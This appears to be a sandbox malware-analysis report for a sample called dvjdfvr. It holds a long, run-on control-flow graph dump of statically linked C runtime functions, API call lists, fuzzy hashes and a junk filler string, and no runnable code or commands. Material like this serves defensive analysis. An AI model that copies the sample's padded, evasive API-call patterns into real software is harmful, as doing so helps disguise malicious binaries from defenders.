6 API calls 6782->6784 6786 4035c1 __calloc_impl 6784->6786 6785 4035db __stbuf 7151 40609d 6785->7151 6786->6755 6788 4035ed __stbuf 7158 406139 6788->7158 6794 4029bd __write_nolock 6792->6794 6793 402ac5 6793->6751 6794->6793 6795 4029fe 12 API calls 6794->6795 7329 402780 6794->7329 6795->6794 6798 405eb9 6797->6798 6801 405c71 6798->6801 6813 405bea 6801->6813 6804 405c98 
6805 405b6a __calloc_impl 67 API calls 6804->6805 6806 405c9d 6805->6806 6807 406ee2 __calloc_impl 6 API calls 6806->6807 6812 402b80 6807->6812 6809 405cd5 6810 405d1a 6809->6810 6821 40a976 6809->6821 6811 405b6a __calloc_impl 67 API calls 6810->6811 6810->6812 6811->6812 6812->6766 6814 405bfd 6813->6814 6820 405c4a 6813->6820 6828 407d9b 6814->6828 6817 405c2a 6817->6820 6848 40a194 6817->6848 6820->6804 6820->6809 6822 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 6821->6822 6823 40a98a 6822->6823 6827 40a997 6823->6827 7036 40b0ba 6823->7036 6827->6809 6829 407d22 __getptd_noexit 67 API calls 6828->6829 6830 407da3 6829->6830 6831 40563c __amsg_exit 67 API calls 6830->6831 6832 405c02 6830->6832 6831->6832 6832->6817 6833 40a900 6832->6833 6834 40a90c __calloc_impl 6833->6834 6835 407d9b __getptd 67 API calls 6834->6835 6836 40a911 6835->6836 6837 40a93f 6836->6837 6838 40a923 6836->6838 6839 4048fc __lock 67 API calls 6837->6839 6840 407d9b __getptd 67 API calls 6838->6840 6841 40a946 6839->6841 6845 40a928 6840->6845 6864 40a8c2 6841->6864 6846 40563c __amsg_exit 67 API calls 6845->6846 6847 40a936 __calloc_impl 6845->6847 6846->6847 6847->6817 6849 40a1a0 __calloc_impl 6848->6849 6850 407d9b __getptd 67 API calls 6849->6850 6851 40a1a5 6850->6851 6852 4048fc __lock 67 API calls 6851->6852 6861 40a1b7 6851->6861 6853 40a1d5 6852->6853 6854 40a21e 6853->6854 6855 40a206 InterlockedIncrement 6853->6855 6856 40a1ec InterlockedDecrement 6853->6856 7032 40a22f 6854->7032 6855->6854 6856->6855 6860 40a1f7 6856->6860 6858 40563c __amsg_exit 67 API calls 6859 40a1c5 __calloc_impl 6858->6859 6859->6820 6860->6855 6862 407275 ___convertcp 67 API calls 6860->6862 6861->6858 6861->6859 6863 40a205 6862->6863 6863->6855 6865 40a8c6 6864->6865 6866 40a8f8 6864->6866 6865->6866 6867 40a79a ___addlocaleref 8 API calls 6865->6867 6872 40a96a 6866->6872 6868 40a8d9 6867->6868 6868->6866 6875 40a829 6868->6875 7031 404822 LeaveCriticalSection 6872->7031 6874 40a971 
6874->6845 6876 40a83a InterlockedDecrement 6875->6876 6877 40a8bd 6875->6877 6878 40a852 6876->6878 6879 40a84f InterlockedDecrement 6876->6879 6877->6866 6889 40a651 6877->6889 6880 40a85c InterlockedDecrement 6878->6880 6881 40a85f 6878->6881 6879->6878 6880->6881 6882 40a869 InterlockedDecrement 6881->6882 6883 40a86c 6881->6883 6882->6883 6884 40a876 InterlockedDecrement 6883->6884 6886 40a879 6883->6886 6884->6886 6885 40a892 InterlockedDecrement 6885->6886 6886->6885 6887 40a8a2 InterlockedDecrement 6886->6887 6888 40a8ad InterlockedDecrement 6886->6888 6887->6886 6888->6877 6890 40a6d5 6889->6890 6892 40a668 6889->6892 6891 407275 ___convertcp 67 API calls 6890->6891 6893 40a722 6890->6893 6894 40a6f6 6891->6894 6892->6890 6900 40a69c 6892->6900 6903 407275 ___convertcp 67 API calls 6892->6903 6898 40a749 6893->6898 6943 40c56b 6893->6943 6896 407275 ___convertcp 67 API calls 6894->6896 6899 40a709 6896->6899 6902 40a78e 6898->6902 6912 407275 67 API calls ___convertcp 6898->6912 6905 407275 ___convertcp 67 API calls 6899->6905 6906 407275 ___convertcp 67 API calls 6900->6906 6918 40a6bd 6900->6918 6901 407275 ___convertcp 67 API calls 6907 40a6ca 6901->6907 6908 407275 ___convertcp 67 API calls 6902->6908 6909 40a691 6903->6909 6904 407275 ___convertcp 67 API calls 6904->6898 6910 40a717 6905->6910 6911 40a6b2 6906->6911 6913 407275 ___convertcp 67 API calls 6907->6913 6914 40a794 6908->6914 6919 40c745 6909->6919 6916 407275 ___convertcp 67 API calls 6910->6916 6935 40c700 6911->6935 6912->6898 6913->6890 6914->6866 6916->6893 6918->6901 6920 40c752 6919->6920 6934 40c7cf 6919->6934 6921 40c763 6920->6921 6923 407275 ___convertcp 67 API calls 6920->6923 6922 40c775 6921->6922 6924 407275 ___convertcp 67 API calls 6921->6924 6925 40c787 6922->6925 6926 407275 ___convertcp 67 API calls 6922->6926 6923->6921 6924->6922 6927 40c799 6925->6927 6928 407275 ___convertcp 67 API calls 6925->6928 6926->6925 6929 40c7ab 6927->6929 6930 407275 ___convertcp 67 API 
calls 6927->6930 6928->6927 6931 407275 ___convertcp 67 API calls 6929->6931 6932 40c7bd 6929->6932 6930->6929 6931->6932 6933 407275 ___convertcp 67 API calls 6932->6933 6932->6934 6933->6934 6934->6900 6936 40c741 6935->6936 6937 40c70d 6935->6937 6936->6918 6938 40c71d 6937->6938 6940 407275 ___convertcp 67 API calls 6937->6940 6939 40c72f 6938->6939 6941 407275 ___convertcp 67 API calls 6938->6941 6939->6936 6942 407275 ___convertcp 67 API calls 6939->6942 6940->6938 6941->6939 6942->6936 6944 40c57c 6943->6944 6945 40a742 6943->6945 6946 407275 ___convertcp 67 API calls 6944->6946 6945->6904 6947 40c584 6946->6947 6948 407275 ___convertcp 67 API calls 6947->6948 6949 40c58c 6948->6949 6950 407275 ___convertcp 67 API calls 6949->6950 6951 40c594 6950->6951 6952 407275 ___convertcp 67 API calls 6951->6952 6953 40c59c 6952->6953 6954 407275 ___convertcp 67 API calls 6953->6954 6955 40c5a4 6954->6955 6956 407275 ___convertcp 67 API calls 6955->6956 6957 40c5ac 6956->6957 6958 407275 ___convertcp 67 API calls 6957->6958 6959 40c5b3 6958->6959 6960 407275 ___convertcp 67 API calls 6959->6960 6961 40c5bb 6960->6961 6962 407275 ___convertcp 67 API calls 6961->6962 6963 40c5c3 6962->6963 6964 407275 ___convertcp 67 API calls 6963->6964 6965 40c5cb 6964->6965 6966 407275 ___convertcp 67 API calls 6965->6966 6967 40c5d3 6966->6967 6968 407275 ___convertcp 67 API calls 6967->6968 6969 40c5db 6968->6969 6970 407275 ___convertcp 67 API calls 6969->6970 6971 40c5e3 6970->6971 6972 407275 ___convertcp 67 API calls 6971->6972 6973 40c5eb 6972->6973 6974 407275 ___convertcp 67 API calls 6973->6974 6975 40c5f3 6974->6975 6976 407275 ___convertcp 67 API calls 6975->6976 6977 40c5fb 6976->6977 6978 407275 ___convertcp 67 API calls 6977->6978 6979 40c606 6978->6979 6980 407275 ___convertcp 67 API calls 6979->6980 6981 40c60e 6980->6981 6982 407275 ___convertcp 67 API calls 6981->6982 6983 40c616 6982->6983 6984 407275 ___convertcp 67 API calls 6983->6984 6985 40c61e 6984->6985 6986 
407275 ___convertcp 67 API calls 6985->6986 6987 40c626 6986->6987 6988 407275 ___convertcp 67 API calls 6987->6988 6989 40c62e 6988->6989 6990 407275 ___convertcp 67 API calls 6989->6990 6991 40c636 6990->6991 6992 407275 ___convertcp 67 API calls 6991->6992 6993 40c63e 6992->6993 6994 407275 ___convertcp 67 API calls 6993->6994 6995 40c646 6994->6995 6996 407275 ___convertcp 67 API calls 6995->6996 6997 40c64e 6996->6997 6998 407275 ___convertcp 67 API calls 6997->6998 6999 40c656 6998->6999 7000 407275 ___convertcp 67 API calls 6999->7000 7001 40c65e 7000->7001 7002 407275 ___convertcp 67 API calls 7001->7002 7003 40c666 7002->7003 7004 407275 ___convertcp 67 API calls 7003->7004 7005 40c66e 7004->7005 7006 407275 ___convertcp 67 API calls 7005->7006 7007 40c676 7006->7007 7008 407275 ___convertcp 67 API calls 7007->7008 7009 40c67e 7008->7009 7010 407275 ___convertcp 67 API calls 7009->7010 7011 40c68c 7010->7011 7012 407275 ___convertcp 67 API calls 7011->7012 7013 40c697 7012->7013 7014 407275 ___convertcp 67 API calls 7013->7014 7015 40c6a2 7014->7015 7016 407275 ___convertcp 67 API calls 7015->7016 7017 40c6ad 7016->7017 7018 407275 ___convertcp 67 API calls 7017->7018 7019 40c6b8 7018->7019 7020 407275 ___convertcp 67 API calls 7019->7020 7021 40c6c3 7020->7021 7022 407275 ___convertcp 67 API calls 7021->7022 7023 40c6ce 7022->7023 7024 407275 ___convertcp 67 API calls 7023->7024 7025 40c6d9 7024->7025 7026 407275 ___convertcp 67 API calls 7025->7026 7027 40c6e4 7026->7027 7028 407275 ___convertcp 67 API calls 7027->7028 7029 40c6ef 7028->7029 7030 407275 ___convertcp 67 API calls 7029->7030 7030->6945 7031->6874 7035 404822 LeaveCriticalSection 7032->7035 7034 40a236 7034->6861 7035->7034 7037 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7036->7037 7038 40a9bf 7037->7038 7039 40c529 7038->7039 7040 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7039->7040 7041 40c53c 7040->7041 7044 40c36f 7041->7044 7045 40c390 GetStringTypeW 7044->7045 7046 40c3bb 
7044->7046 7048 40c3b0 GetLastError 7045->7048 7049 40c3a8 7045->7049 7047 40c4a2 7046->7047 7046->7049 7072 40f4cc GetLocaleInfoA 7047->7072 7048->7046 7050 40c3f4 MultiByteToWideChar 7049->7050 7067 40c49c 7049->7067 7056 40c421 7050->7056 7050->7067 7052 40841c __atodbl_l 5 API calls 7054 40c527 7052->7054 7054->6827 7055 40c4f3 GetStringTypeA 7060 40c50e 7055->7060 7055->7067 7057 403395 _malloc 67 API calls 7056->7057 7061 40c436 _memset ___convertcp 7056->7061 7057->7061 7059 40c46f MultiByteToWideChar 7063 40c485 GetStringTypeW 7059->7063 7064 40c496 7059->7064 7065 407275 ___convertcp 67 API calls 7060->7065 7061->7059 7061->7067 7063->7064 7068 40bf65 7064->7068 7065->7067 7067->7052 7069 40bf71 7068->7069 7070 40bf82 7068->7070 7069->7070 7071 407275 ___convertcp 67 API calls 7069->7071 7070->7067 7071->7070 7073 40f4ff 7072->7073 7075 40f4fa 7072->7075 7074 403558 ___ansicp 90 API calls 7073->7074 7074->7075 7076 40841c __atodbl_l 5 API calls 7075->7076 7077 40c4c6 7076->7077 7077->7055 7077->7067 7078 40f515 7077->7078 7079 40f5df 7078->7079 7080 40f555 GetCPInfo 7078->7080 7084 40841c __atodbl_l 5 API calls 7079->7084 7081 40f5ca MultiByteToWideChar 7080->7081 7082 40f56c 7080->7082 7081->7079 7087 40f585 _strlen 7081->7087 7082->7081 7083 40f572 GetCPInfo 7082->7083 7083->7081 7086 40f57f 7083->7086 7085 40c4e7 7084->7085 7085->7055 7085->7067 7086->7081 7086->7087 7088 403395 _malloc 67 API calls 7087->7088 7090 40f5b7 _memset ___convertcp 7087->7090 7088->7090 7089 40f614 MultiByteToWideChar 7091 40f64b 7089->7091 7092 40f62c 7089->7092 7090->7079 7090->7089 7093 40bf65 ___convertcp 67 API calls 7091->7093 7094 40f650 7092->7094 7095 40f633 WideCharToMultiByte 7092->7095 7093->7079 7096 40f65b WideCharToMultiByte 7094->7096 7097 40f66f 7094->7097 7095->7091 7096->7091 7096->7097 7098 40912c __calloc_crt 67 API calls 7097->7098 7099 40f677 7098->7099 7099->7091 7100 40f680 WideCharToMultiByte 7099->7100 7100->7091 7101 40f692 7100->7101 7102 407275 
___convertcp 67 API calls 7101->7102 7102->7091 7104 405c71 strtoxl 91 API calls 7103->7104 7105 403582 7104->7105 7105->6745 7107 4044f1 7106->7107 7108 4044c8 7106->7108 7109 405b6a __calloc_impl 67 API calls 7107->7109 7124 40440f 7108->7124 7112 4044f6 __ctrlfp 7109->7112 7111 4044ec 7111->6776 7112->6776 7114 404546 __handle_exc 7113->7114 7116 40457a __except2 7114->7116 7139 4041a9 7114->7139 7117 4045bd 7116->7117 7118 404595 7116->7118 7119 4043ae __umatherr 67 API calls 7117->7119 7120 40440f __umatherr 67 API calls 7118->7120 7121 4045b8 __ctrlfp 7119->7121 7120->7121 7122 40841c __atodbl_l 5 API calls 7121->7122 7123 4045e1 7122->7123 7123->6776 7125 404419 7124->7125 7126 404492 __ctrlfp 7125->7126 7128 404434 __ctrlfp __umatherr 7125->7128 7127 4043ae __umatherr 67 API calls 7126->7127 7129 4044a7 7127->7129 7130 404482 7128->7130 7132 4043ae 7128->7132 7129->7111 7130->7111 7133 4043b9 7132->7133 7134 4043ce 7132->7134 7136 4043d3 7133->7136 7137 405b6a __calloc_impl 67 API calls 7133->7137 7135 405b6a __calloc_impl 67 API calls 7134->7135 7135->7136 7136->7130 7138 4043c6 7137->7138 7138->7130 7142 403ecd 7139->7142 7143 403ef4 __raise_exc_ex 7142->7143 7144 4040e7 RaiseException 7143->7144 7145 404100 7144->7145 7145->7116 7147 406023 EnterCriticalSection 7146->7147 7148 40600d 7146->7148 7147->6785 7149 4048fc __lock 67 API calls 7148->7149 7150 406016 7149->7150 7150->6785 7166 40ad9b 7151->7166 7155 4060ff 7155->6788 7156 4060b2 __stbuf 7156->7155 7157 4090e7 __malloc_crt 67 API calls 7156->7157 7157->7155 7159 406144 7158->7159 7160 403616 7158->7160 7159->7160 7181 40aba4 7159->7181 7162 40362e 7160->7162 7163 403633 __stbuf 7162->7163 7323 40606e 7163->7323 7165 40363e 7165->6786 7167 4060ac 7166->7167 7168 40adaa 7166->7168 7172 40ad37 7167->7172 7169 405b6a __calloc_impl 67 API calls 7168->7169 7170 40adaf 7169->7170 7171 406ee2 __calloc_impl 6 API calls 7170->7171 7171->7167 7173 40ad44 7172->7173 7174 40ad53 7172->7174 7175 405b6a 
__calloc_impl 67 API calls 7173->7175 7176 40ad77 7174->7176 7177 405b6a __calloc_impl 67 API calls 7174->7177 7178 40ad49 7175->7178 7176->7156 7179 40ad67 7177->7179 7178->7156 7180 406ee2 __calloc_impl 6 API calls 7179->7180 7180->7176 7182 40abbd 7181->7182 7186 40abdf 7181->7186 7183 40ad9b __fileno 67 API calls 7182->7183 7182->7186 7184 40abd8 7183->7184 7187 40d126 7184->7187 7186->7160 7188 40d132 __calloc_impl 7187->7188 7189 40d155 7188->7189 7190 40d13a 7188->7190 7192 40d163 7189->7192 7195 40d1a4 7189->7195 7212 405b7d 7190->7212 7194 405b7d __dosmaperr 67 API calls 7192->7194 7197 40d168 7194->7197 7215 40fb88 7195->7215 7196 405b6a __calloc_impl 67 API calls 7207 40d147 __calloc_impl 7196->7207 7199 405b6a __calloc_impl 67 API calls 7197->7199 7201 40d16f 7199->7201 7200 40d1aa 7202 40d1b7 7200->7202 7203 40d1cd 7200->7203 7204 406ee2 __calloc_impl 6 API calls 7201->7204 7225 40c9f3 7202->7225 7206 405b6a __calloc_impl 67 API calls 7203->7206 7204->7207 7209 40d1d2 7206->7209 7207->7186 7208 40d1c5 7284 40d1f8 7208->7284 7210 405b7d __dosmaperr 67 API calls 7209->7210 7210->7208 7213 407d22 __getptd_noexit 67 API calls 7212->7213 7214 405b82 7213->7214 7214->7196 7216 40fb94 __calloc_impl 7215->7216 7217 40fbef 7216->7217 7220 4048fc __lock 67 API calls 7216->7220 7218 40fc11 __calloc_impl 7217->7218 7219 40fbf4 EnterCriticalSection 7217->7219 7218->7200 7219->7218 7221 40fbc0 7220->7221 7222 40fbd7 7221->7222 7224 409087 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7221->7224 7287 40fc1f 7222->7287 7224->7222 7226 40ca02 __write_nolock 7225->7226 7227 40ca34 7226->7227 7228 40ca5b 7226->7228 7258 40ca29 7226->7258 7230 405b7d __dosmaperr 67 API calls 7227->7230 7231 40cac3 7228->7231 7232 40ca9d 7228->7232 7229 40841c __atodbl_l 5 API calls 7233 40d124 7229->7233 7234 40ca39 7230->7234 7236 40cad7 7231->7236 7291 40d2e3 7231->7291 7235 405b7d __dosmaperr 67 API calls 7232->7235 7233->7208 7237 405b6a __calloc_impl 67 API calls 7234->7237 
7238 40caa2 7235->7238 7241 40ad37 __write_nolock 67 API calls 7236->7241 7240 40ca40 7237->7240 7243 405b6a __calloc_impl 67 API calls 7238->7243 7244 406ee2 __calloc_impl 6 API calls 7240->7244 7242 40cae2 7241->7242 7245 40cd88 7242->7245 7250 407d9b __getptd 67 API calls 7242->7250 7246 40caab 7243->7246 7244->7258 7248 40d057 WriteFile 7245->7248 7249 40cd98 7245->7249 7247 406ee2 __calloc_impl 6 API calls 7246->7247 7247->7258 7253 40cd6a 7248->7253 7254 40d08a GetLastError 7248->7254 7251 40ce76 7249->7251 7274 40cdac 7249->7274 7252 40cafd GetConsoleMode 7250->7252 7273 40cf56 7251->7273 7276 40ce85 7251->7276 7252->7245 7256 40cb28 7252->7256 7255 40d0d5 7253->7255 7253->7258 7260 40d0a8 7253->7260 7254->7253 7255->7258 7259 405b6a __calloc_impl 67 API calls 7255->7259 7256->7245 7257 40cb3a GetConsoleCP 7256->7257 7257->7253 7282 40cb5d 7257->7282 7258->7229 7262 40d0f8 7259->7262 7264 40d0b3 7260->7264 7265 40d0c7 7260->7265 7261 40ce1a WriteFile 7261->7254 7261->7274 7270 405b7d __dosmaperr 67 API calls 7262->7270 7263 40cfbc WideCharToMultiByte 7263->7254 7267 40cff3 WriteFile 7263->7267 7266 405b6a __calloc_impl 67 API calls 7264->7266 7304 405b90 7265->7304 7271 40d0b8 7266->7271 7272 40d02a GetLastError 7267->7272 7267->7273 7268 40cefa WriteFile 7268->7254 7268->7276 7270->7258 7275 405b7d __dosmaperr 67 API calls 7271->7275 7272->7273 7273->7253 7273->7255 7273->7263 7273->7267 7274->7253 7274->7255 7274->7261 7275->7258 7276->7253 7276->7255 7276->7268 7278 40f863 11 API calls __putwch_nolock 7278->7282 7279 40cc09 WideCharToMultiByte 7279->7253 7281 40cc3a WriteFile 7279->7281 7280 40fa3f 79 API calls __fassign 7280->7282 7281->7254 7281->7282 7282->7253 7282->7254 7282->7278 7282->7279 7282->7280 7283 40cc8e WriteFile 7282->7283 7301 40b0f2 7282->7301 7283->7254 7283->7282 7322 40fc28 LeaveCriticalSection 7284->7322 7286 40d200 7286->7207 7290 404822 LeaveCriticalSection 7287->7290 7289 40fc26 7289->7217 7290->7289 7309 40fb11 7291->7309 7293 
control_flow_graph (remainder of the node/edge list omitted; it was rendered from the graph viewer as one run-on line). The graph covers statically linked CRT runtime helpers in the 0x402xxx to 0x40fxxx range (__calloc_impl, __dosmaperr, __lock/LeaveCriticalSection wrappers, __initterm, _flsall, __fileno, __write_nolock, __lseeki64_nolock, __close_nolock, __cftoe/__cftof/__fptostr, __fltout2, __atodbl_l, ___crtLCMapStringA, __setmbcp, __isctype_l) plus one sample function at 0x40278d whose edges reference _memset, SetFileAttributesA, GetCommConfig, CommConfigDialogW, ReadConsoleInputA, GetVersionExW, InterlockedIncrement, SetVolumeMountPointW and GlobalMemoryStatus. Other APIs referenced by graph nodes: SetFilePointer, GetLastError, DeleteCriticalSection, EnterCriticalSection, RtlUnwind, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, GetModuleHandleA, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, SetStdHandle, CloseHandle, InterlockedDecrement, RaiseException, SetLastError.

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                        • String ID:
                                                        • API String ID: 2477803136-0
                                                        • Opcode ID: 55a75209081753db21fe90352bca722720aa1b5174487b2b9d7f02c13d1d6b9a
                                                        • Instruction ID: 4d34ed221a603986baafc3b490fe9ee0ac988487a940e438daf9dc0b721e7aab
                                                        • Opcode Fuzzy Hash: 55a75209081753db21fe90352bca722720aa1b5174487b2b9d7f02c13d1d6b9a
                                                        • Instruction Fuzzy Hash: 782194A1D0074499EB147F739846B6F2A689F0070AF10487FF4457A1D2EABCDE419B5D

                                                        Control-flow Graph

control_flow_graph (basic blocks): 62 4055dc-4055fe HeapCreate; 63 405600-405601; 64 405602-40560b; edges 62->63, 62->64
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004055F1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: c3123c9c4030a1a5e9ae62ae76111dcff124cdbe5bbe755f4680c7aacda7825b
                                                        • Instruction ID: 77f26234ab174d6b3d664015af184a37d4aef173991afb3d41f41048f881ceb4
                                                        • Opcode Fuzzy Hash: c3123c9c4030a1a5e9ae62ae76111dcff124cdbe5bbe755f4680c7aacda7825b
                                                        • Instruction Fuzzy Hash: 2CD0A7765543456EDB005F76BC09B633BDCE784395F108436F90CC6590F674C590CB08

                                                        Control-flow Graph

                                                        APIs
                                                        • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 0040281F
                                                        • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 00402864
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,gosiyoruvazaligusa lejivo hutawucadajira,00000000,?,00000000), ref: 00402891
                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 004028A0
                                                        • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004028B3
                                                        • GetComputerNameW.KERNEL32(?,?), ref: 004028C4
                                                        • ClearCommBreak.KERNEL32(00000000), ref: 004028CC
                                                        • InterlockedIncrement.KERNEL32(?), ref: 004028D6
                                                        • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004028DE
                                                        • GetTempFileNameW.KERNEL32(00000000,?,00000000,00000000), ref: 004028F1
                                                        • _memset.LIBCMT ref: 00402906
                                                        • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00402916
                                                        • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 0040292B
                                                        • GetVersionExW.KERNEL32(?), ref: 00402938
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00402942
                                                        • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 00402954
                                                        • GlobalMemoryStatus.KERNEL32(00000000), ref: 0040295C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Comm$ConfigFileIncrementInterlockedNameVersion$AttributesBreakClearComputerConsoleDialogDriveEnumFormatFormatsGlobalInfoInputLogicalMemoryMountNumberPointReadStatusStringsTempTimeVerifyVolume_memset
                                                        • String ID: $gosiyoruvazaligusa lejivo hutawucadajira
                                                        • API String ID: 506528498-2210585140
                                                        • Opcode ID: 037e5d191132ad2b14524fa6fca01ab55c1a2ed6f758744307c817d5b39f1ee1
                                                        • Instruction ID: cf355d90496da7791a3c19a47d785b8762527cb921606fece1e7f5650e3ceb49
                                                        • Opcode Fuzzy Hash: 037e5d191132ad2b14524fa6fca01ab55c1a2ed6f758744307c817d5b39f1ee1
                                                        • Instruction Fuzzy Hash: 01611C75E40208AFDB10DF94DD89B9EB7B4FB48701F108169E605BB2D0D7B46A44CF69

                                                        Control-flow Graph

                                                        APIs
                                                        • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402A0F
                                                        • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00402A15
                                                        • GetConsoleAliasExesW.KERNEL32(?,00000000), ref: 00402A24
                                                        • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A3A
                                                        • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 00402A44
                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A5E
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A70
                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00402A78
                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00402A7E
                                                        • SetEnvironmentVariableA.KERNEL32(00000000,?), ref: 00402A8D
                                                        • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402A9F
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00402AAC
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246459888.000000000044A000.00000008.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246485852.000000000044F000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246511546.000000000045B000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFormatName$ModuleTime$AliasConsoleEnvironmentExesNamedNumberObjectPipeProcessShortValueVariable
                                                        • String ID:
                                                        • API String ID: 4163992861-0
                                                        • Opcode ID: de64801f7f8460ace1fac7cd90a485005b25414184570f5667c97c45307c5d74
                                                        • Instruction ID: b63d3673e0c5033209ebad036fb76a060e8bb29fbe4bc934e374f6f9c6a1ff10
                                                        • Opcode Fuzzy Hash: de64801f7f8460ace1fac7cd90a485005b25414184570f5667c97c45307c5d74
                                                        • Instruction Fuzzy Hash: 0F218735784304BBF760AB95DE4AF997764DB44B12F104065F748BA1D0CEB05984CB79

                                                        Control-flow Graph (image not extracted)
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0040B438
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040B44D
                                                        • UnhandledExceptionFilter.KERNEL32(00401BEC), ref: 0040B458
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0040B474
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0040B47B
                                                        • Note: this sequence (IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter, then TerminateProcess with exit code C0000409 = STATUS_STACK_BUFFER_OVERRUN) is the MSVC CRT's statically linked /GS stack-cookie failure path (__report_gsfailure), not an anti-debugging check written by the malware author. GetCurrentProcess takes no parameters; the C0000409 shown against it is the neighbouring stack slot, the exit code pushed for TerminateProcess.
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.4246363450.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.4246335243.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246363450.000000000041C000.00000020.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000007.00000002.4246432725.0000000000449000.00000004.00000001.01000000.00000005.sdmp
